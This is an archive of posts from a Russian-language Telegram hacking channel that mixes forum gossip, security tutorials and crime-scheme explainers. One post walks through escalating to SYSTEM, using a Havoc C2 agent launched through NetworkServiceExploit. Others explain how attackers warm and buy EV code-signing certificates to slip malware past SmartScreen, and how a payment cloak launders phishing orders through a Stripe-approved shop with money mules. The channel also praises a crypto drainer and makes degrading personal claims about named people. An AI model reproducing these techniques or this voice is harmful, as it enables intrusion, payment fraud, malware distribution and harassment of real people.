en
Feedback
KnightPentest🛡

KnightPentest🛡

Open in Telegram

⚠️Весь материал используйте только в ознакомительных целях⚠️ Чат, приходи общаться, бро @GreyHatChat

Show more
6 843
Subscribers
No data24 hours
+6167 days
+3 49330 days
Posts Archive
CryptoGrab - худший криптодрейнер, с заебистой рекламой, как у браузера Амиго. Также они присутствовали на конференции MAC Af
CryptoGrab - худший криптодрейнер, с заебистой рекламой, как у браузера Амиго. Также они присутствовали на конференции MAC Affiliate Conference в Армении. Мы - KnightPentest не давали разрешения рекламироваться в нашем телеграм канале. И считаем, что никакого толка от их конторы нет. Вот профиль этих ребят, любителей халявной рекламы: https://xss.is/members/245402/ репутация в хакерской среде у них крайне хуевая, депозита на форуме нет. https://xss.is/threads/113710/ - а тут они плачутся, что Angel Drainer ебет их=)))) 😂😂😂 Angel Drainer - двигает хакерское комьюнити вперед, постоянно спонсирует форум XSS, устраивает интересные конкурсы, щедро платит за рекламу. А CryptoGrab шайтанская контора, которая нашла пару баб и разместилась в Армении. Жалкая пародия, которая не должна существовать в хакерских кругах. Как Яндекс допустил эту хуйню: https://yandex.ru/maps/org/kriptograb/117067298397/?ll=-0.119528%2C51.516997&z=16 Это просто п@#$ец. Чернуха рекламится в моем паблике и мне еще не платят. С х**яли???

Но за бабки ДА=)))) TELEGRAM ADS пропускает рекламу криптодрейнеров😂😂😂 Причем сука в моем канале рекламируются эти ребята.
Но за бабки ДА=)))) TELEGRAM ADS пропускает рекламу криптодрейнеров😂😂😂 Причем сука в моем канале рекламируются эти ребята. Утром проснулся зашел в свой канал увидел=))) Лучше б мне заплатили. Я бы пост сделал))
Telegram Ads Platform — официальная платформа для запуска рекламы в мессенджере.

После задержания Павла Дурова выходят нежелательные французские обновления👀 - Теперь авторы статей не могут прикреплять скри
После задержания Павла Дурова выходят нежелательные французские обновления👀 - Теперь авторы статей не могут прикреплять скриншоты в telegra.ph (ранее можно было не по ссылке прикреплять, а из подгрузить файл) - Полезные телеграмм каналы по информационной безопасности не индексируются в поисковой выдачи телеграм. Так например @mirea находится в теневом бане=) Спасибо, что хоть по @knightpentest можно найти :DDD - Многие OSINT телеграм боты удалены, а каналы с утечками попадают в теневой бан и нужно оспаривать в тех. поддержке. #telegram

Дневники программ вымогателей 5 шт👀 Читать в pdf: https://t.me/GreyHatChat/275/11366 #кибербезопасность #activedirectory
Дневники программ вымогателей 5 шт👀 Читать в pdf: https://t.me/GreyHatChat/275/11366 #кибербезопасность #activedirectory

Ar3s основатель проекта Damagelab, ботнета Andromeda. Или просто крутой мужик за которым охотились ФБР комментирует ситуацию,
Ar3s основатель проекта Damagelab, ботнета Andromeda. Или просто крутой мужик за которым охотились ФБР комментирует ситуацию, которая связана с KnightPentest журналистом=)))
Добрый день. Тут на форуме была очередная история где я, якобы, дал интервью каким-то типам из телеги. До этого (в июне кажется) была история в дискорде, где мой "ученик" открыл курсы пентеста. Благо там быстро удалось всех вывести на чистую воду. У меня вопрос. Что за нахер такой? Я больше не даю интервью, не лезу в пентесты, хакинг, форумную жизнь и даркнет в целом. Есть два форума куда я захожу иногда, просто почитать, что в мире творится. Это XSS и Exploit. У меня никогда не было учеников, у меня не осталось близких друзей в даркнете (вернее люди остались, только я не знаю их новых никнеймов, и, наверное, уже не хочу знать, что бы не подставить осознанно или случайно), я не разрабатываю и не продаю ничего что связано с даркнетом. У меня нет проблем с законом. Я работаю на прежнем месте. Меня волнует успеваемость моего ребенка в школе, здоровье моих родителей и счастье в моей семье. Ради эмоций езжу 1-2 раза в неделю на мотоцикле по лесам и полям. Мне 41 год и я стал ленивой жопой. А теперь по ситуации. Я вижу, что некоторые умники начали спекулировать старыми никами. Просто ради пиара и продвижения собственных интересов. Это сильно напрягает. Я предлагаю admin сделать какой-нибудь топик, где у любого из старых пердунов можно уточнить давал ли он интервью или материалы кому-то, куда-то или это очередной вброс. Я с удовольствием подпишусь и буду отслеживать сообщения в такой теме. Ну или просто по человечески прошу, если наткнетесь на очередное интервью или любую иную хероту с моим участием - дайте знать пожалуйста. PM форума (уведомление на почту упадет), старые жабы ar3s@dlab.im, ar3s@exploit.im, ar3s@thesecure.biz
admin xss отвечает Аресу
Ar3s, да, неприятно. Начало здесь student, он же Ново-Огарёво уже в бане. Я знаю только 2 "Ареса" - Ar3s и Ares (Intercepter-ng). Оба - уважаемые люди, с именем. В частной беседе student сказал, что его обманули, он не со зла и ничего дурного сделать не хотел. В любом случае, это было максимально глупо, местами даже смешно. Никто из стариков не поверит, что разговор был с Ar3s, ответы явно не твои, это сразу видно. Даже не знаю, кто бы мог поверить в этот текст, возможно, те, кто тапает хомяка?
Наши комментарии Очень рады, что Сергей Ar3s влиятельный эксперт, основатель damagelab читает наш канал. Это правда круто👍🏻 Не было задачей навредить форуму и Сергею уж точно🏆 Журналистка Елизавета x4n4x из команды KnightPentest комментирует
Серёж, это я брала интервью. Меня подставили украинские хакактивисты, прости, пожалуйста дуру💔
@mirea - авторитетный блог по информационной безопасности💪

Anton Lopanitsyn aka Bo0oM поделился расширением для Burp Suite, которое используют багхантеры для выявления SQL INJECTION и
Anton Lopanitsyn aka Bo0oM поделился расширением для Burp Suite, которое используют багхантеры для выявления SQL INJECTION и других уязвимостей😻 ➡️ https://github.com/volkandindar/agartha 🔥 - благодарность Буму, Антону, Кавычке @mirea - авторитетный блог по информационной безопасности💻 #pentest #web #burpsuite #portswigger

student интересные факты о криминальном элементе👀 - Брат братвы - Зять админа xss - Писатель, журналист - Бывший хакер - Неа
student интересные факты о криминальном элементе👀 - Брат братвы - Зять админа xss - Писатель, журналист - Бывший хакер - Неадекват - Подвергся деанону со стороны Лизы x4n4x security (ранее была сотрудницей бизона, при чем старший пентестер) - В нетрезвом состоянии был замечен с Лизой x4n4x security, сосал ее в щеку. - высшее незаконченное образование. - Отчислили за рекламу криптомиксеров. - мусорской (по мнению пользователей exploit) - Сомнительный персонаж (по мнению братвы)

Злоумышленники покупают EV сертификаты для пролива инсталлов Автор: Liza x4n4x security, стажер айти компании KnightPentest (
Злоумышленники покупают EV сертификаты для пролива инсталлов Автор: Liza x4n4x security, стажер айти компании KnightPentest (в прошлом старший пентестер компании #bi_zone) Эксклюзивно для KnightPentest Community👺 Что такое EV сертификат🔍
EV-сертификат (Extended Validation) — это вид SSL-сертификата, который требует самой строгой проверки перед выдачей. Его основная задача — убедить посетителей сайта в том, что они действительно на доверенном ресурсе, принадлежащем легальной компании.
Чем полезно для плохих парней😤 🔴Полезен при взломе сайтов с EV-сертификатами: Удачный взлом такого сайта позволяет использовать доверие пользователей к сертификату. 🟢EV-сертификаты могут быть полезны злоумышленникам в контексте программного обеспечения (софта) для создания поддельного доверия к вредоносным или нежелательным программам. Основная цель использования EV-сертификата для софта — убедить операционную систему, антивирусные программы и пользователей в том, что программа надёжна и легитимна. Почему хакеры прогревают сертификаты❕ 🟣 Прогрев нужен на детект от chrome. "Прогретый" сертификат (сертификат с историей использования) вызывает меньше подозрений, поскольку браузер видит его как проверенный и менее вероятно заблокирует или пометит загружаемое ПО как опасное. 🟠Вредоносное ПО с прогретым сертификатом имеет больше шансов быть установленным пользователем, так как выглядит безопаснее и вызывает меньше вопросов. 🔴Злоумышленники могут создать и распространять "легитимные" программы, которые не вызывают подозрений (например, небольшие утилиты), и подписывать их этим сертификатом. Чтобы заполучить репутацию=) Это чем-то напоминает спам через smtp, цель попасть в inbox, а не spam. Спаммеры стараются создать репутацию для своего домена или IP-адреса, чтобы системы антиспама доверяли им больше 🔵Злоумышленники используют дешевый трафик (например, из Индии или Бразилии) и распространяют легитимное ПО в разных регионах. Это помогает увеличить число установок и создать статистику использования, чтобы сертификат выглядел надёжным для антивирусов и Windows Defender. После того как сертификат набрал траст (обычно это занимает некоторое время и несколько тысяч установок), злоумышленники начинают подписывать этим же сертификатом вредоносное ПО. Преимущества подписи EV сертификатом 🔵мгновенное подтверждение репутации в фильтре Microsoft SmartScreen 🟣подпись неограниченного количество приложений одним сертификатом 🔴позволяет игнорировать красные/жёлтые алерты User Account Control (UAC) 🔵более долгий срок жизни сертификата, в сравнении с другими видами сертификатов 🔴приложения подписанные сертификатом вызывают большее доверие у пользователей Возможные варианты передачи EV сертификата 🟢Если клиент имеет на руках SafeNet eToken 5110 CC / Rutoken 3.0, то продавец серта может выпустить сертификат прямо на клиента токен 🔵Продавец может предоставить клиенту удалённый доступ к токену с уже установленным сертификатом, тем самым, клиент сможет подписывать приложения не имея токена на руках 🟣Продавец может отправить токен с уже установленным сертификатом клиенту/дропу через транспортные компании 🟢Продавец может подписать клиента файлы приобретенным сертификатом, чтобы клиент не тратил на это время / не создавали себе головную боль на тему покупки и хранения токена. Стоимость EV сертификата (ориентируемся на рынок злоумышленников) 💰 🟠Цена сертификата из наличия: 4,000$ 🔴Цена сертификата под заказ: 3,000$ Важная информация💔
Облачные провайдеры и некоторые CA могут отправлять данные о подписанных приложениях для проверки. Таким образом, злоумышленник, подписывающий вредоносное ПО, может оказаться под мониторингом самого CA, что создаёт риск отзыва сертификата и добавления подписанных файлов в антивирусные базы.
Если хакер использует сертификат, попадая в базы, такие как VirusTotal, то другие службы безопасности и антивирусы могут получить доступ к информации о сертификате и подписанных им файлах. Это создаёт риск для дальнейшего использования сертификата, так как его репутация может ухудшиться.
@mirea 💻 #pentest

Рыжая бестия Елизавета x4n4x KnightPentest security, продолжает раскрывать злобные деяния кардеров👀 Всем привет! Я Елизавета
Рыжая бестия Елизавета x4n4x KnightPentest security, продолжает раскрывать злобные деяния кардеров👀 Всем привет! Я Елизавета, ранее работала старшим пентестером в компании #bi_zone на данный момент решила отвлечься, вступить в молодое комьюнити "KnightPentest". Ребята очень перспективные, иногда буду делиться своими короткими наработками=) Елизавета про малолетних кардеров на вещевухе🖕
В последнее время бл*ять эти американские кардеры стали такие мягкие, как детское говно нах*й. Если они не стоят ни на чем, то упадут от всего.
Один диллер е*нулся совсем и присылает мне в ватцап....
i need to develop payment cloak that would do a b redirection, User places order on site A (high risk)
- User gets redirected to site B (low risk / Stripe approved) payment page
- Order is created on both sites, random products are added to the order on site B and the order value from site A is matched.
- Stripe thinks the traffic comes from site B and processes the payment.
Стоит пояснить что сайт A - это фишинг. Куда злоумышленник направляет клиента. А вот сайт B - это вполне себе легитимный сайт, например как магазин футболок у бизона❕ Про клоакинг помните мы писали ранее, мой партнер Макс (x999x) Кирцов который да, сливал на экспу готовый вариант. Дак вот суть такая же. основная идея такой схемы — использовать легитимный магазин, чтобы списать деньги с карты через одобренный Stripe сайт (сайт B) Создание или использование двух сайтов:
Сайт A — основной сайт, где пользователи размещают заказы на высокорисковые или запрещённые товары и услуги. Сайт B — легитимный и надёжный сайт, который подключён к платёжной системе (например, Stripe). Этот сайт обычно проходит проверки, имеет высокое доверие и одобрение со стороны платёжных систем. Перенаправление пользователя: Когда клиент оформляет заказ на сайте A, система перенаправляет его на сайт B для оплаты. На сайте B создаётся "поддельный" заказ, который соответствует сумме заказа на сайте A, но с другим, менее подозрительным списком товаров или услуг. Обработка платежа на сайте B: Пользователь оплачивает заказ на сайте B через Stripe или другую платёжную систему, которая видит транзакцию как легитимную и обрабатывает её. Поскольку сайт B не вызывает подозрений, платёжная система завершает транзакцию. Получение средств: После того как плата пройдена и средства поступают на счет сайта B, злоумышленник получает доступ к этим средствам. Обычно это делается через вывод денег с подключённого банковского счёта или кошелька. Часто злоумышленники могут использовать подставные компании или дропов (людей, которые временно предоставляют свои счета) для вывода средств, что усложняет отслеживание. Перевод денег или обналичивание: Деньги, зачисленные на аккаунт сайта B, затем могут быть переведены на другие счета или обналичены через банковские переводы, электронные кошельки или даже криптовалютные обменники, чтобы скрыть конечного получателя и затруднить отслеживание.
@mirea - авторитетный блог по информационной безопасности💻

Российские хакеры не рады видеть AELS/CrazyMark - Андрей Тарасов (AELS) - сдал своих партнеров. - Пользователи хакерских фору
Российские хакеры не рады видеть AELS/CrazyMark - Андрей Тарасов (AELS) - сдал своих партнеров. - Пользователи хакерских форумов обвиняют пользователя AELS в терроризме, т.к он жертвовал свои финансы ВСУ. - AELS вернулся на форумы под другим никнеймом и заявил, что его родина это весь земной шар. Данная информация - это лишь мнение форумных пользователей и она может отличаться от действительности. Но проанализировав некоторые комментарии можно сделать вывод, что Андрея (AELS), который избежал наказания и сейчас находится в РФ поддерживают в основном украинские партнеры. Голосование 🧡 - комментаторы правы AELS сбежал в РФ как запахло жаренным и всех сдал. 🔥 - сплетни. Пусть сначала докажут. @mirea - авторитетный блог по информационной безопасности⚡️

DPAPI для чайников(практика)🖥 Автор: Елизавета x4n4x security (эксклюзивчик для @mirea) Даже имея SID, MasterKey, Entropy и
DPAPI для чайников(практика)🖥 Автор: Елизавета x4n4x security (эксклюзивчик для @mirea) Даже имея SID, MasterKey, Entropy и Clear Text, получить идентичный результат DPAPI с помощью онлайн-сервисов не удастся из-за системных зависимостей и уникальных метаданных, которые добавляет сама Windows. Наша задача лишь понять примерный алгоритм на практике. Узнаем где что хранится и как это работает=) Первое, что мы сделаем - это узнаем SID текущего пользователя
whoami /user
KnightPentest\Lizka S-1-5-21-4170774641-386150424-2152198521-1601
Узнаем где хранится masterkey🥡
C:\Users\Lizka\AppData\Roaming\Microsoft\Protect\{SID}
Не забудьте {SID} заменить на свой Многие файлы могут быть скрыты в этой директории, поэтому если вы хотите осмотреться, то не забывайте добавлять флаг /a
dir /a
2518e0b6-babc-4fea-85e8-8ecd9166c0d3
8b3b12b1-9ec1-4095bc12-91194cb05828
Preferred
Файлы содержат зашифрованные MasterKey. Их два, потому что пароль пользователя был изменён. При смене пароля создается новый файл с зашифрованным MasterKey, а старый файл не удаляется, поскольку ранее зашифрованная информация привязана к нему. Файл Preferred указывает на текущий MasterKey, который считается "активным" и используется по умолчанию для новых операций шифрования. Перейдем на уровень выше ../
CREDHIST
Файл CREDHIST хранит зашифрованные хеши предыдущих паролей пользователя, чтобы система могла проверять их уникальность и требовать новый пароль, если старый уже использовался. Вот схема шифрования текста "Knight" с помощью DPAPI
Clear Text ("Knight") 
    ↓ (Преобразование в байты)
[75, 110, 105, 103, 104, 116] (Clear Text в байтах)
    ↓
SID (S-1-5-21-123456789-123456789-123456789-1001)
    ↓ (Поиск MasterKey для текущего SID)
MasterKey: bde4c2b27c3b4df5a7a7d8f6350f9f7b
    ↓
Entropy ("MyExtraSalt")
    ↓ (Преобразование Entropy в байты)
[77, 121, 69, 120, 116, 114, 97, 83, 97, 108, 116] (Entropy в байтах)
    ↓ (Генерация Session Key на основе MasterKey и Entropy)
Session Key: 5d4a5b6f9a2e4c7f6b5d4f2e4a5d6c3e
    ↓
[75, 110, 105, 103, 104, 116] (Clear Text в байтах)
    ↓ (Шифрование с использованием Session Key)
Ciphertext: [202, 176, 56, 193, 215, 239] (примерный зашифрованный текст)
    ↓ (Кодирование в Base64)
Ciphertext (Base64): AQAAANCMnd8BFdERjHoAwE/Cl+sBAAAAKFGN+LtFbG6D4bJG4vS...
Как дешифровать
Ciphertext (Base64): AQAAANCMnd8BFdERjHoAwE/Cl+sBAAAAKFGN+LtFbG6D4bJG4vS... ↓ (Декодирование из Base64) Ciphertext (байты): [202, 176, 56, 193, 215, 239] (примерные данные) ↓ (Получение SID текущего пользователя) SID: S-1-5-21-123456789-123456789-123456789-1001 ↓ MasterKey: Система использует SID для нахождения нужного MasterKey MasterKey: bde4c2b27c3b4df5a7a7d8f6350f9f7b (загружается из защищенного хранилища) ↓ Entropy ("MyExtraSalt") (если использовалась при шифровании) ↓ (Преобразование Entropy в байты) Entropy (байты): [77, 121, 69, 120, 116, 114, 97, 83, 97, 108, 116] ↓ (Генерация рабочего ключа на основе MasterKey и Entropy) Session Key: 5d4a5b6f9a2e4c7f6b5d4f2e4a5d6c3e (тот же рабочий ключ, что и при шифровании) ↓ Ciphertext (байты): [202, 176, 56, 193, 215, 239] ↓ (Расшифровка с использованием Session Key) Clear Text (байты): [75, 110, 105, 103, 104, 116] ↓ (Преобразование байтов в текст) Clear Text: "Knight"
Многие стандартные программы и службы Windows, а также сторонние приложения, использующие DPAPI, по умолчанию не применяют Entropy для шифрования. В таких случаях данные шифруются только с использованием MasterKey, что позволяет расшифровывать их, зная только учетную запись пользователя (SID) и системные ключи. @mirea - авторитетный блог по информационной безопасности💻 #pentest #windows #шифрование #ctf #capturetheflag

DPAPI для чайников(теория)🖥 Автор: Елизавета x4n4x security (эксклюзивчик для @mirea) DPAPI (Data Protection API) — механизм
DPAPI для чайников(теория)🖥 Автор: Елизавета x4n4x security (эксклюзивчик для @mirea)
DPAPI (Data Protection API) — механизм Windows для шифрования данных, привязанный к учетной записи пользователя или машины.
👉Где используется - Internet Explorer/Edge (для сохранения паролей) - Chrome и Firefox (защита данных пользователей) - Outlook (защита учетных данных) - Windows Credential Manager (управление учетными данными) Основные понятия💡 Clear Text - данные в открытом виде, которые требуется зашифровать SID (Security Identifier) - Уникальный идентификатор пользователя или группы в Windows, привязанный к каждому пользователю MasterKey - Основной ключ шифрования, созданный и управляемый Windows для каждого пользователя. MasterKey используется DPAPI для генерации временного рабочего ключа, который шифрует данные. Entropy - соль (опционально) Рабочий ключ (Session Key) - Временный ключ, генерируемый на основе MasterKey и, при необходимости, Entropy Ciphertext - Зашифрованные данные, полученные после применения рабочего ключа к Clear Text. Ciphertext вместе с метаинформацией кодируется в Base64 для хранения и передачи. DataProtectionScope - определяет каким образом привязываются зашифрованные данные. CurrentUser — данные привязываются к текущей учетной записи пользователя. LocalMachine — данные привязываются к компьютеру и могут быть расшифрованы любым пользователем на данной системе. Метаинформация DPAPI - Служебные данные, добавляемые в зашифрованный результат, такие как версия DPAPI и параметры шифрования. Эта информация позволяет DPAPI корректно определить параметры при расшифровке. Теперь необходимо полученную информацию закрепить на практике✔️ (читайте следующую часть) @mirea - авторитетный блог по информационной безопасности💻 #pentest #шифрование #windows

Генератор словарей: https://app.wgen.io/ Есть возможность указать немало информации, которую вы ранее собрали из открытых ист
Генератор словарей: https://app.wgen.io/ Есть возможность указать немало информации, которую вы ранее собрали из открытых источников🏆 Источник: @mirea #pentest #web

Когда готовилось это интервью изначально мы заливали его на teletype=)) Меньше, чем за сутки администрация платформы (teletyp
Когда готовилось это интервью изначально мы заливали его на teletype=)) Меньше, чем за сутки администрация платформы (teletype) удалила его😁😁😁 Зато на teletype есть статьи по каржу: https://teletype.in/@bjh_garant/zalivlogs Реверсеры видимо опаснее. По👀

Повышаем привилегии до SYSTEM🏆 Ранее я показывал как с помощью dll hijacking с обычных пользователей доапаться до админа. Те
Повышаем привилегии до SYSTEM🏆 Ранее я показывал как с помощью dll hijacking с обычных пользователей доапаться до админа. Теперь проберемся сразу до SYSTEM. Я использую C2 Havoc (как его установить я тоже рассказывал).
Listeners --> Add --> Name любое, в Host (Bind) указываем тот интерфейс через который наша жертва может с нами общаться (видеть нас) --> save
Attack --> Payload --> Format: Windows Exe --> Generate
На хосте там где мы входим в группу администраторов прописываем
shell whoami /priv
SeImpersonatePrivilege - нас интересует эта привилегия (у меня она был включена). Гуглим 🔜 SeImpersonatePrivilege exploit Вот некоторые варианты ✔️ - SigmaPotato (про картошки рекомендую почитать чуть подробнее и посмотреть видеоролик blackhatusa, баламут зальет в чат) - PrintSpoofer - NetworkServiceExploit Я буду использовать 3 вариант. Через C2 Havoc shell прописываем
shell NetworkServiceExploit.exe -i -c xxx.exe
Где xxx.exe - это наш агент C2. Сразу получаем сессию и проверяем сидку=)
24/10/2024 17:59:37 [knight] Demon » whoami
[*] [9AD032CF] Tasked demon to get the info from whoami /all without starting cmd.exe
[+] Send Task to Agent [31 bytes]
[+] Received Output [4824 bytes]:

WORKGROUP\bratva$  S-1-5-18
SID S-1-5-18, известная как SYSTEM. В отличие от учетных записей администраторов, которые ограничены в некоторых аспектах безопасности для защиты системы от ошибок пользователя или вредоносного ПО, SYSTEM фактически является "суперпользователем", обладающим наивысшими привилегиями. Полезная шпаргалка по привилегиям. Тут даже есть эксплоиты: - https://github.com/gtworek/Priv2Admin @mirea - авторитетный блог по информационной безопасности💻 #pentest #ctf #capturetheflag #activedirectory #redteam

Андрей Владимирович Тарасов (AELS) смог вернуться в Россию👍 Подробная информация: https://www.secretservice.gov/investigatio
Андрей Владимирович Тарасов (AELS) смог вернуться в Россию👍 Подробная информация: https://www.secretservice.gov/investigations/mostwanted/tarasov

Nvidia закрыла пользователям из РФ доступ к обновлениям драйверов видеокарт — об этом сообщает @mirea Это очевидная иностранн
Nvidia закрыла пользователям из РФ доступ к обновлениям драйверов видеокарт — об этом сообщает @mirea
Это очевидная иностранная пропаганда нацеленная на повышения риска кибератак в РФ.
- Обновление через сайт не работает. Блок на РУ айпи. с ВПН всё нормально грузит. Через приложение тоже всё четко, без проблем обновилось

Новая статья от рыжей бестии Елизаветы x4n4x security в прошлом старший пентестер #bi_zone ныне стажер айти компании KnightPe
Новая статья от рыжей бестии Елизаветы x4n4x security в прошлом старший пентестер #bi_zone ныне стажер айти компании KnightPentest Майнер от инженера НИЦ Курчатов Читать: https://ox6d7266.ru/2024/10/08/LPSOPG-miner-ot-nrckir.ru.html #bizone #osint

Жесть=) Человеку помочь уже жалко. Этот мир совсем прогнил. Актуальный контент только у KnightPentest 👀 * Признаны нежелател
Жесть=) Человеку помочь уже жалко. Этот мир совсем прогнил. Актуальный контент только у KnightPentest 👀 * Признаны нежелательной организацией на всех хакерских форумах * Подборка полезных статей✔️ - API Acunetix + SQLMAP - My First Burp Extension | Enable Tor Proxy By Burp - How to Rotate IP ADDRESS For Each Request in Burp Suite @mirea - нежелательная организация в хакерских кругах💻 #pentest #burpsuite #proxy #opsec #web

Новости из мира фраеров =)) 👀 Мы ранее размещались на таких площадках: - damagelab (xss) - exploit - BreachForums - Некоторы
Новости из мира фраеров =)) 👀 Мы ранее размещались на таких площадках: - damagelab (xss) - exploit - BreachForums - Некоторые другие малоизвестные ресурсы Подводим некоторые итоги - Работать на клиентов - это неблагодарная работа. - Все хотят выехать на твоем горбу, заплатить ниже рынка, получить дополнительную консультацию. И рыбку съесть на хуй сесть. - Быть форумным кодером - это не про деньги. Скорее ты начинаешь обладать знаниями, получаешь сервисы, мысли злоумышленников. И уже понимаешь откуда ноги растут. - 75% киберпреступников неопытные пользователи. Некоторые не умеют пользоваться powershell, командной строкой. ЦА на форумах XSS - отсюда приходили самые адекватные парни, у которых есть потенциал. Были интересные кейсы, не жалко даже было разработать софт в 5 раз ниже рынка=) Но как только бабки закончились - энтузиазм утих, та и еще нас оттуда выпиздили, когда узнали, что мы никакого отношения к хакерам не имеем=))) BreachForums - постоянно какая-то подстава. Большие подозрения, что пишут только спецслужбы. Максимально черная работа от которой всегда отказывались. Увы на этом форуме делать нечего. exploit - оставим без комментариев. Там некоторые парни вообще не планируют развиваться, кто-то бл*ть файл создать на windows не смог, к кому-то по анидеску пришлось подключаться запускать cmd.exe и прописывать путь до папки. Мы очень не любим работать с необразованными людьми, хамами, нервы не выдержали=))) С сегодняшнего дня наш сервис закрыт. Опыт хороший, главное к этому никогда не вернуться😂😂😂 Нашего кодера кстати взяли в T-BANK, частично поэтому работа прекратилась. Нет времени, та и нах*й надо, жрать тоже хочется. Всем советуем работать официально.